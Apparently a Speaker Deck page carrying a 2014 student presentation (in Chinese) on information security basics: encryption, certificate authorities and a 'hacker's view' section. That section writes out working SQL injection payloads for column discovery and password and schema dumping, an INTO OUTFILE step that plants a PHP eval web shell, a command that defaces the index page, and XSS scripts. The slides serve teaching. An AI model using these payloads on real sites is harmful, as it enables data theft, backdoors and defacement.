Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Information Security
Search
Bleu (Jia-Huei Ren)
February 24, 2014
Technology
0
54
Information Security
AIS presentation
[email protected]
Bleu (Jia-Huei Ren)
February 24, 2014
Tweet
Share
More Decks by Bleu (Jia-Huei Ren)
See All by Bleu (Jia-Huei Ren)
Introduction to Convolutional Neural Networks
divjose
0
88
Recently doing-20161110
divjose
0
46
Industry 5.0
divjose
0
240
Big Data
divjose
0
72
Database Management Concepts
divjose
0
72
Bleu Framework for Hbase & Hadoop
divjose
0
83
Paper discuss : Hadoop & HBase
divjose
1
62
Visualizing social network concepts
divjose
0
86
Determinants of RFID adoption intention: Evidence from Taiwanese retail chains
divjose
0
69
Other Decks in Technology
See All in Technology
Qiita埋め込み用スライド
naoki_0531
0
2.8k
Wvlet: A New Flow-Style Query Language For Functional Data Modeling and Interactive Data Analysis - Trino Summit 2024
xerial
1
110
成果を出しながら成長する、アウトプット駆動のキャッチアップ術 / Output-driven catch-up techniques to grow while producing results
aiandrox
0
260
DevOps視点でAWS re:invent2024の新サービス・アプデを振り返ってみた
oshanqq
0
180
LINEスキマニにおけるフロントエンド開発
lycorptech_jp
PRO
0
330
20241220_S3 tablesの使い方を検証してみた
handy
3
370
TSKaigi 2024 の登壇から広がったコミュニティ活動について
tsukuha
0
160
.NET 9 のパフォーマンス改善
nenonaninu
0
810
OpenAIの蒸留機能(Model Distillation)を使用して運用中のLLMのコストを削減する取り組み
pharma_x_tech
4
550
Opcodeを読んでいたら何故かphp-srcを読んでいた話
murashotaro
0
110
AWS re:Invent 2024 ふりかえり
kongmingstrap
0
130
LINE Developersプロダクト(LIFF/LINE Login)におけるフロントエンド開発
lycorptech_jp
PRO
0
120
Featured
See All Featured
Large-scale JavaScript Application Architecture
addyosmani
510
110k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
365
25k
Practical Orchestrator
shlominoach
186
10k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
How STYLIGHT went responsive
nonsquared
95
5.2k
Making Projects Easy
brettharned
116
5.9k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.2k
Faster Mobile Websites
deanohume
305
30k
Measuring & Analyzing Core Web Vitals
bluesmoon
4
170
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
28
900
Producing Creativity
orderedlist
PRO
341
39k
Reflections from 52 weeks, 52 projects
jeffersonlam
347
20k
Transcript
會計資訊系統簡報 - 資訊安全 簡報製作 : 四資管四甲 任家輝 指導教授 : 杜佩樺
隱密性 如何確保只有寄件者及收件者可以 讀取資料
可認證性 如何知道資料是來自原寄件者
完整性 如何知道資料沒有被更改過
不可抵賴性 防止資料傳輸/接收發生後對行為 的否認。
秘密金鑰加密法(對稱性加密)
公開金鑰加密法(非對稱性加密) • 收件者保留私密金鑰,並將公開金鑰公諸 於世,送件者依照公開金鑰將訊息加密, 收件者在使用私密金鑰進行解密
公開金鑰加密法(非對稱性加密)
可逆加密與不可逆加密
安全認證中心CA
延伸內容 – 從駭客面談資安 了解駭客思維,才能應付千方百計 的駭客
CSRF
None
SQLi
None
查詢注入欄位 • 注入時,可能會先使用 UNION 找出可以插 入的地方爲何,例如: • http://localhost/news/?mod=news&act =show&id=-1 union
select 1,2,3,4,5,6,7
• 可以看出 3, 4, 7 的地方可以插入我們想要獲取的資 料, 假如我們想要知道當前使用者為何,可以將 7 的地
方改成 user() 如: • http://localhost/news/?mod=news&act=show& id=-1 union select 1,2,3,4,5,6,user()
None
• 若是要取得某欄位的資訊的話(以使 用者密碼為例),則是注入-1 union select 1,2,3,4,5,6,password from user limit 0,1
• 使用(SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE
@ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name) )) ) )x)將整個資料庫dump出來
寫後門改首頁 • ?MOD=NEWS&ACT=SHOW&ID=1 INTO OUTFILE '../../../../apache24/htdoc s/.a.php' LINES TERMINATED BY
'<?php eval($_GET[cmd];)?>' • 透過outfile的方式建立後門檔案到網站目 錄中
再透過fwrite的方式更改首頁。 • /.a.php?cmd=$fp = fopen('index.php', 'w');fwrite($fp, "Hack by 49941131");fclose($fp);
None
或是直接以最高權限執行 server command
XSS
使用訊息框進行XSS attack • <script>alert(‘hello’)</script>
利用XSS改首頁 <script>window.onload = function(){document.write('hacked by 49941131')}</script>
謝謝
divjose
naoki_0531
xerial
aiandrox
.jpg){kind=avatar}
oshanqq
lycorptech_jp
handy
tsukuha
nenonaninu
.png){kind=icon}
pharma_x_tech
murashotaro
kongmingstrap
addyosmani
cassininazir
shlominoach
denniskardys
nonsquared
brettharned
productmarketing
deanohume
bluesmoon
garrettdimon
orderedlist
jeffersonlam
